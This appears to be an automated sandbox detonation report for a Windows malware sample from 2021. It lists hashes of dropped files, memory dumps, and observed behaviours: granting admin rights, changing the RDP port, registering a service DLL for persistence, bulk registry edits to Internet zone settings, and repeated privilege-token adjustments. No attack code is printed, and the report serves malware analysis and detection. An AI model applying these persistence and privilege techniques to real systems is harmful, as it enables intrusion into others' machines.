\??\c:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.cmdline

MD5 42b1e0d6a1a5d46f424f69c08056f109
SHA1 bde110e753c015e01262d25622879494614f5d8e
SHA256 ced72d70b458a56c64aea1e6980926d396e06fad6cf1a32e3ba52b161962dc63
SHA512 9e3c96c83ee810ecb75ad34a68094a570af7e63566999d3be1c715770196a36a74b16897c629eb0646049484c5177119d2406f52281155a83ffa1e0190da0e71

\??\c:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/1880-78-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\4ollxdjq\CSCD430DA36425C492D97B3F7169A39AFC7.TMP

MD5 80c76621bec505be239d2b1878cef6a1
SHA1 6e4243610eff9e8fc7382946b3b9b30a8cf02ebc
SHA256 bc0171b6a2bfb6e93ede410f94fcd11e3ec6465f1327117a7155f27021e2b6ee
SHA512 035f1a8eac02941a21bda12aa5dd242288eeb5d72092fc20d0f853de72767cc468867ac97201d88204c43b1eb387659b6b80b4f409dede7cd71b9bd132beb0d8

C:\Users\Admin\AppData\Local\Temp\RES620D.tmp

MD5 5b8a94dfda8c7e90f27aaf735f458be1
SHA1 05f42ee946d3e77e1e45b7ce81dc0489616eeeae
SHA256 583bf5969033ec2e83d9ec8f36112b91def284c7dca749753f2b18e75872a1f3
SHA512 50464838c3582eb3ef863aad40ab14b50447f50a68d1ae6ba20fc8853fcd7bf52f9bf19ae7b87dd187c96e081b9f8ea77b26457984d29315b608f0e9c21c83e4

C:\Users\Admin\AppData\Local\Temp\4ollxdjq\4ollxdjq.dll

MD5 98cf504ea3f4bd519eefc9c1bc49d5f8
SHA1 5bdc66329a762fa4c81e3d5e5e82c2136e1d139a
SHA256 c04bd3cfe59a27bd1e6adb95a1fa63a195fa1a4828c37e91f8c0f66471540cc8
SHA512 d17156dc0788aec18e212d93836dcad1e9efa25db0d9acc9353efd78ce8d0c63cbe4d1901533d4c00ce7f737ae1d7b68eea3e180a17e6107d2dbbec83cdf9701

memory/568-82-0x0000000002420000-0x0000000002421000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 43473f4e719958639a9d89e5d8388999
SHA1 ccb79eb606a23daa4b3ff8f996a2fbf281f31491
SHA256 ce84b142a2983e1f60b3051cbff38153424a016178ce3fcf703e3694eb474734
SHA512 1051092c5eae13758e8e01086907effc5c603cc1f9456fb2cdb951cb4b196c5c3d089ffd2e981b5d6731b0e6b24402fb2808a20f66ac6dcb1704a8f4b457b1fa

memory/568-84-0x000000001B690000-0x000000001B691000-memory.dmp

memory/568-85-0x000000001B7B0000-0x000000001B7B1000-memory.dmp

memory/568-86-0x000000001B4D0000-0x000000001B4D1000-memory.dmp

memory/1372-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 78030f8214f9aee63258fef119445881
SHA1 d8ebc69c3ebfce88a8010b1c40ffe3c1fb8932d9
SHA256 0d4b1b677658a2590720cb7c62732d62de52499e8f7f7aa70aea6e4c412163f6
SHA512 a4d852a5a5e20050dcb414cfd27e301b7005a8a100edc289326c6529edeee455f8e37bf9222619ee65cd0622590f9b2c79e6b3410438f23d498c03d572a80e0b

memory/1372-92-0x000000001AC80000-0x000000001AC82000-memory.dmp

memory/1372-93-0x000000001AC84000-0x000000001AC86000-memory.dmp

memory/1372-95-0x0000000002440000-0x0000000002441000-memory.dmp

memory/1372-97-0x000000001B730000-0x000000001B731000-memory.dmp

memory/1372-99-0x00000000026A0000-0x00000000026A1000-memory.dmp

memory/1372-100-0x0000000001E20000-0x0000000001E21000-memory.dmp

memory/568-101-0x000000001AA2A000-0x000000001AA49000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5 13ae3d1b91f093a5999e0701e1e017e0
SHA1 6b357e3e27c09c2153460392efbac9076f2f2ef7
SHA256 c85e996edc262b5472aa839a2887f796c5a155673b7a95a45a56c4c9ad398078
SHA512 3e3b016dc6724db45fd9ea379426647cc4f730d581219498b5926dcd08dfd5f8167cf3d7123d03c0629610892bc1f773eba8a6d37def674fa2837a5dd5373faf

memory/1372-106-0x000000001A9D0000-0x000000001A9D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4de183f2-8fd1-4dd9-8a1f-7a37a5677403

MD5 6f0d509e28be1af95ba237d4f43adab4
SHA1 c665febe79e435843553bee86a6cea731ce6c5e4

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-20 09:16

Reported

2021-07-20 09:19

Platform

win10v20210410

Max time kernel

49s

Max time network

113s

Command Line

"C:\Users\Admin\AppData\Local\Temp\exe1.bin.exe"

Signatures

Grants admin privileges

Modifies RDP port number used by Windows

Sets DLL path for service in the registry

persistence

UPX packed file

upx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_kjkza3sr.cco.ps1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B29.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B2A.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B3A.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B4B.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lish24en.kit.psm1 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI4B09.tmp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Icon = "inetcpl.cpl#00004480" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Icon = "shell32.dll#0018" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\ef29a4ec885fa451 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,User Agent," C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\CurrentLevel = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags = "33" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Runs net.exe

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
